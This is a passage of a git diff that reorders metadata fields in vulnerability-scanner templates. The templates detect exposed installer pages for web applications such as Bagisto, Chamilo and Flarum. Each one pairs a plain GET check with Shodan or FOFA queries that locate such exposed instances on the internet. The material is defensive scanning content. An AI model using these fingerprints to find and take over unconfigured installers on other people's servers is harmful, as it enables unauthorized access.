4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml index dcce31941f..d631e22d4d 100644 --- a/http/misconfiguration/installer/bagisto-installer.yaml +++ b/http/misconfiguration/installer/bagisto-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Bagisto is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Bagisto Installer" - product: bagisto vendor: webkul + product: bagisto + shodan-query: http.title:"Bagisto Installer" tags: misconfig,bagisto,install,exposure - classification: - cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b73e4ad96e1f51d647d1dbbe0cc021942038823d651e366a631627031caabc6022100e276eda2bd5d639c74569bf84080e9213406b99673a93d94883bc319ce400809:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008b73e4ad96e1f51d647d1dbbe0cc021942038823d651e366a631627031caabc6022100e276eda2bd5d639c74569bf84080e9213406b99673a93d94883bc319ce400809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/bitrix24-installer.yaml b/http/misconfiguration/installer/bitrix24-installer.yaml index 3e622c2dd5..39a2adfa75 100644 --- a/http/misconfiguration/installer/bitrix24-installer.yaml +++ b/http/misconfiguration/installer/bitrix24-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: high description: Bitrix24 is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-2115208104 - product: bitrix24 vendor: bitrix24 + product: bitrix24 + shodan-query: http.favicon.hash:-2115208104 tags: misconfig,bitrix24,install,exposure - classification: - cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index d4b05ffc9e..aaf518b9cc 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed Call.com Setup page. reference: - https://cal.com/ + classification: + cpe: cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="Setup | Cal.com" - product: cal.com vendor: cal + product: cal.com + fofa-query: body="Setup | Cal.com" tags: misconfig,install,exposure,cal - classification: - cpe: cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/chamilo-installer.yaml b/http/misconfiguration/installer/chamilo-installer.yaml index 8ba6f1d41a..0be3471514 100644 --- a/http/misconfiguration/installer/chamilo-installer.yaml +++ b/http/misconfiguration/installer/chamilo-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Chamilo is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"Chamilo has not been installed" - product: chamilo vendor: chamilo + product: chamilo + shodan-query: title:"Chamilo has not been installed" tags: misconfig,chamilo,install,exposure - classification: - cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/main/install/index.php' stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -35,4 +36,5 @@ http: part: body words: - 'Chamilo has not been installed' -# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml index 5b570d7d44..c309e60464 100644 --- a/http/misconfiguration/installer/clipbucket-installer.yaml +++ b/http/misconfiguration/installer/clipbucket-installer.yaml @@ -5,17 +5,17 @@ info: author: DhiyaneshDk severity: high description: ClipBucket is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:clip-bucket:clipbucket:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: clip-bucket + product: clipbucket shodan-query: http.favicon.hash:538583492 fofa-query: icon_hash="538583492" - product: clipbucket - vendor: clip-bucket tags: misconfig,clipbucket,install,exposure - classification: - cpe: cpe:2.3:a:clip-bucket:clipbucket:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/cloudcenter-Installer.yaml b/http/misconfiguration/installer/cloudcenter-Installer.yaml index a9824dad6b..a6bdc8bf05 100644 --- a/http/misconfiguration/installer/cloudcenter-Installer.yaml +++ b/http/misconfiguration/installer/cloudcenter-Installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: unknown description: CloudCenter is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"CloudCenter Installer" - product: cloudcenter vendor: cisco + product: cloudcenter + shodan-query: title:"CloudCenter Installer" tags: misconfig,cisco,cloudcenter,install,exposure - classification: - cpe: cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031c0d953e9c0ac319d7fd76c22f1a1da2f4713e73faa5a0ab3e33a7b41a3dc66022100f7f1f7c008cd9010950a91333afd5f396f973825ae374a4322b2dcf7f52468c9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022031c0d953e9c0ac319d7fd76c22f1a1da2f4713e73faa5a0ab3e33a7b41a3dc66022100f7f1f7c008cd9010950a91333afd5f396f973825ae374a4322b2dcf7f52468c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml index 58f2b14282..e033f54822 100644 --- a/http/misconfiguration/installer/codeigniter-installer.yaml +++ b/http/misconfiguration/installer/codeigniter-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: unknown description: Codeigniter Application is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Codeigniter Application Installer" - product: codeigniter vendor: codeigniter + product: codeigniter + shodan-query: http.title:"Codeigniter Application Installer" tags: misconfig,codeigniter,install,exposure - classification: - cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f5a7be95611a09d7ddfed23dd31623ab52be56be04a6dad23b28f5d4c1ae50f02204ecdc564640c43c3a3b70a31e63ce90ac35606079e31f5dd5c0c3ebb59fac106:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205f5a7be95611a09d7ddfed23dd31623ab52be56be04a6dad23b28f5d4c1ae50f02204ecdc564640c43c3a3b70a31e63ce90ac35606079e31f5dd5c0c3ebb59fac106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/combodo-itop-installer.yaml b/http/misconfiguration/installer/combodo-itop-installer.yaml index a1183f7db8..c01b6abfc2 100644 --- a/http/misconfiguration/installer/combodo-itop-installer.yaml +++ b/http/misconfiguration/installer/combodo-itop-installer.yaml @@ -7,16 +7,16 @@ info: description: Combodo iTop is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.itophub.io/wiki/page?id=2_4_0:install:install_wizard + classification: + cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"Installation" html:"itop" - product: itop vendor: combodo + product: itop + shodan-query: html:"Installation" html:"itop" tags: misconfig,itop,install,exposure - classification: - cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml index 312f64f518..1d4d17883f 100644 --- a/http/misconfiguration/installer/concrete-installer.yaml +++ b/http/misconfiguration/installer/concrete-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: high description: Concrete is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Install concrete" - product: concrete_cms vendor: concretecms + product: concrete_cms + shodan-query: title:"Install concrete" tags: misconfig,exposure,install,concrete - classification: - cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aee4c924c2e7aa89a7cf5c5e8a62ffa301ab5bf24ac02ebfe4a50c52fb5247fe022100fe66bcf33dc4c5b8a7b3ba0ac201fdf08641b402364e0b685115bd990834e9b5:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100aee4c924c2e7aa89a7cf5c5e8a62ffa301ab5bf24ac02ebfe4a50c52fb5247fe022100fe66bcf33dc4c5b8a7b3ba0ac201fdf08641b402364e0b685115bd990834e9b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/connectwise-setup.yaml b/http/misconfiguration/installer/connectwise-setup.yaml index 9b5d91fde1..de864e2d08 100644 --- a/http/misconfiguration/installer/connectwise-setup.yaml +++ b/http/misconfiguration/installer/connectwise-setup.yaml @@ -4,16 +4,16 @@ info: name: ConnectWise Setup Wizard - Exposure author: DhiyaneshDk severity: high + classification: + cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"ContentPanel SetupWizard" - product: control vendor: connectwise + product: control + shodan-query: html:"ContentPanel SetupWizard" tags: misconfig,exposure,install,connectwise - classification: - cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index 3c58d28f86..630ba6eda0 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -8,16 +8,16 @@ info: Detects the presence of XOOPS Custom installation page. reference: - https://www.exploit-db.com/ghdb/1115 + classification: + cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="XOOPS Custom Installation" - product: xoops vendor: xoops + product: xoops + fofa-query: title="XOOPS Custom Installation" tags: misconfig,xoops,installer - classification: - cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/discourse-installer.yaml b/http/misconfiguration/installer/discourse-installer.yaml index 5a083aa657..9085ddc172 100644 --- a/http/misconfiguration/installer/discourse-installer.yaml +++ b/http/misconfiguration/installer/discourse-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: unknown description: Discourse is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Discourse Setup" - product: discourse vendor: discourse + product: discourse + shodan-query: title:"Discourse Setup" tags: misconfig,discourse,install - classification: - cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201ea8e1354bc06bd0609e85d1ed297952d0b8077c52cd2862a976055978d7e411022062c47a84f1d694dcf4b5e8d53809ce41657e918297bd438924b175a1e83eb7d7:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402201ea8e1354bc06bd0609e85d1ed297952d0b8077c52cd2862a976055978d7e411022062c47a84f1d694dcf4b5e8d53809ce41657e918297bd438924b175a1e83eb7d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml index 63cc03ad1f..e99e6b231c 100644 --- a/http/misconfiguration/installer/dokuwiki-installer.yaml +++ b/http/misconfiguration/installer/dokuwiki-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: DokuWiki is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"DokuWiki" - product: dokuwiki vendor: dokuwiki + product: dokuwiki + shodan-query: title:"DokuWiki" tags: misconfig,dokuwiki,install,exposure - classification: - cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4eae166b02d173f22d0da3b881033b343d9cd3bff6e4668fdcfef7eaf47283602203ed0a0ad8427cffaf50092e8dcd5474e1d2725a90a1487f84f40622a009f7e44:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100b4eae166b02d173f22d0da3b881033b343d9cd3bff6e4668fdcfef7eaf47283602203ed0a0ad8427cffaf50092e8dcd5474e1d2725a90a1487f84f40622a009f7e44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml index fd3755f828..8990f47b8b 100644 --- a/http/misconfiguration/installer/dolibarr-installer.yaml +++ b/http/misconfiguration/installer/dolibarr-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: high description: Dolibarr is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Dolibarr install or upgrade" - product: dolibarr_erp\\/crm vendor: dolibarr + product: dolibarr_erp\\/crm + shodan-query: title:"Dolibarr install or upgrade" tags: misconfig,exposure,install - classification: - cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220634532cbd8d85911eb5be70b6c6ba95f4e883927aeefa918bb7c7f7eec6c70e402200490d5848a436de703b294c57a533b11b5ef3006488a289b72028e9842d55872:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220634532cbd8d85911eb5be70b6c6ba95f4e883927aeefa918bb7c7f7eec6c70e402200490d5848a436de703b294c57a533b11b5ef3006488a289b72028e9842d55872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml index 5ef1e11140..2a0bdfd4ed 100644 --- a/http/misconfiguration/installer/dolphin-installer.yaml +++ b/http/misconfiguration/installer/dolphin-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Dolphin is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:boonex:dolphin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: icon_hash="-945121295" - product: dolphin vendor: boonex + product: dolphin + fofa-query: icon_hash="-945121295" tags: misconfig,dolphin,install,exposure - classification: - cpe: cpe:2.3:a:boonex:dolphin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml index 872bdb18da..ac16f29c96 100644 --- a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed EJBCA Enterprise Cloud Installation page. reference: - https://aws.amazon.com/marketplace/pp/prodview-u2xdo5mkuilke + classification: + cpe: cpe:2.3:a:primekey:ejbca:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard" - product: ejbca vendor: primekey + product: ejbca + shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard" tags: misconfig,install,exposure,ejbca - classification: - cpe: cpe:2.3:a:primekey:ejbca:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/elgg-install.yaml b/http/misconfiguration/installer/elgg-install.yaml index 20e2dce4e9..b519d5ba95 100644 --- a/http/misconfiguration/installer/elgg-install.yaml +++ b/http/misconfiguration/installer/elgg-install.yaml @@ -7,16 +7,16 @@ info: description: Elgg Installation was discovered. reference: - https://github.com/elgg/elgg - metadata: - max-request: 1 - verified: true - fofa-query: title="Welcome to Elgg" - product: elgg - vendor: elgg - tags: install,elgg,exposure,misconfig - classification: cpe: cpe:2.3:a:elgg:elgg:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: elgg + product: elgg + fofa-query: title="Welcome to Elgg" + tags: install,elgg,exposure,misconfig + http: - method: GET path: @@ -28,4 +28,5 @@ http: - 'contains_any(body,"Elgg Install : Welcome", "Installing Elgg", "Welcome to Elgg")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502205eea6dd5e913f95ea9c012b78d1994d5fde3c95ad10b6ec91755aa559a38120a02210095c06cb0e37c6846183ea56612ff208fae3e3dae2526158ecb37c11058a3b0bb:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205eea6dd5e913f95ea9c012b78d1994d5fde3c95ad10b6ec91755aa559a38120a02210095c06cb0e37c6846183ea56612ff208fae3e3dae2526158ecb37c11058a3b0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml index 519ed52a6e..84dcf12113 100644 --- a/http/misconfiguration/installer/eshop-installer.yaml +++ b/http/misconfiguration/installer/eshop-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: EShop is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"eShop Installer" - product: eshop vendor: oxid-esales + product: eshop + shodan-query: html:"eShop Installer" tags: misconfig,eshop,install,exposure - classification: - cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b72e0d77fed8b47e8cdb9da1eda690fcb4d5e11b0b6614359d9560e7de36cd8402200347116bdd23cfac7ccc3e2b33f2ac6bbd0b9bb7bffa3e2f8c4dc5a8561931d9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100b72e0d77fed8b47e8cdb9da1eda690fcb4d5e11b0b6614359d9560e7de36cd8402200347116bdd23cfac7ccc3e2b33f2ac6bbd0b9bb7bffa3e2f8c4dc5a8561931d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/espocrm-installer.yaml b/http/misconfiguration/installer/espocrm-installer.yaml index 90ef50240b..2d9a598be5 100644 --- a/http/misconfiguration/installer/espocrm-installer.yaml +++ b/http/misconfiguration/installer/espocrm-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Espocrm is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Welcome to Espocrm" - product: espocrm vendor: espocrm + product: espocrm + shodan-query: html:"Welcome to Espocrm" tags: misconfig,espocrm,install,exposure - classification: - cpe: cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml index f68a3bceee..ce0e4f93c1 100644 --- a/http/misconfiguration/installer/facturascripts-installer.yaml +++ b/http/misconfiguration/installer/facturascripts-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: FacturaScripts is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"FacturaScripts installer" - product: facturascripts vendor: facturascripts + product: facturascripts + shodan-query: html:"FacturaScripts installer" tags: misconfig,facturascripts,install,exposure - classification: - cpe: cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022020a08dcfce34df1143ae7a6029f76d9ed4bfacb7ccd2b01245cd8d743ea3d5eb02203a4aafed8bb6675ad3e181378c7c97bd17bd89e04b723442658dd6d346e5ebbf:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022020a08dcfce34df1143ae7a6029f76d9ed4bfacb7ccd2b01245cd8d743ea3d5eb02203a4aafed8bb6675ad3e181378c7c97bd17bd89e04b723442658dd6d346e5ebbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml index d060142e5c..50d99fe46d 100644 --- a/http/misconfiguration/installer/flarum-installer.yaml +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed Flarum installation pages which could allow unauthorized access or information disclosure. reference: - https://flarum.org/ + classification: + cpe: cpe:2.3:a:flarum:flarum:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Install Flarum" - product: flarum vendor: flarum + product: flarum + shodan-query: html:"Install Flarum" tags: misconfig,install,exposure,flarum - classification: - cpe: cpe:2.3:a:flarum:flarum:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/fossbilling-installer.yaml b/http/misconfiguration/installer/fossbilling-installer.yaml index aaf0032044..76d6394f3f 100644 --- a/http/misconfiguration/installer/fossbilling-installer.yaml +++ b/http/misconfiguration/installer/fossbilling-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | FOSSBilling installation dashboard has been detected. + classification: + cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"FOSSBilling" - product: fossbilling vendor: fossbilling + product: fossbilling + shodan-query: title:"FOSSBilling" tags: fossbilling,install,misconfig - classification: - cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b7b0f6543091bf4d2e67ee2802feb0a57241e524da29c7f944e2ced8ec8e393c022061aea2773aebd96772ca54801007608b062c90bcf5d646e8ce1f4bc66dc017b7:922c64590222798bb761d5b6d8e72950 + +# digest: 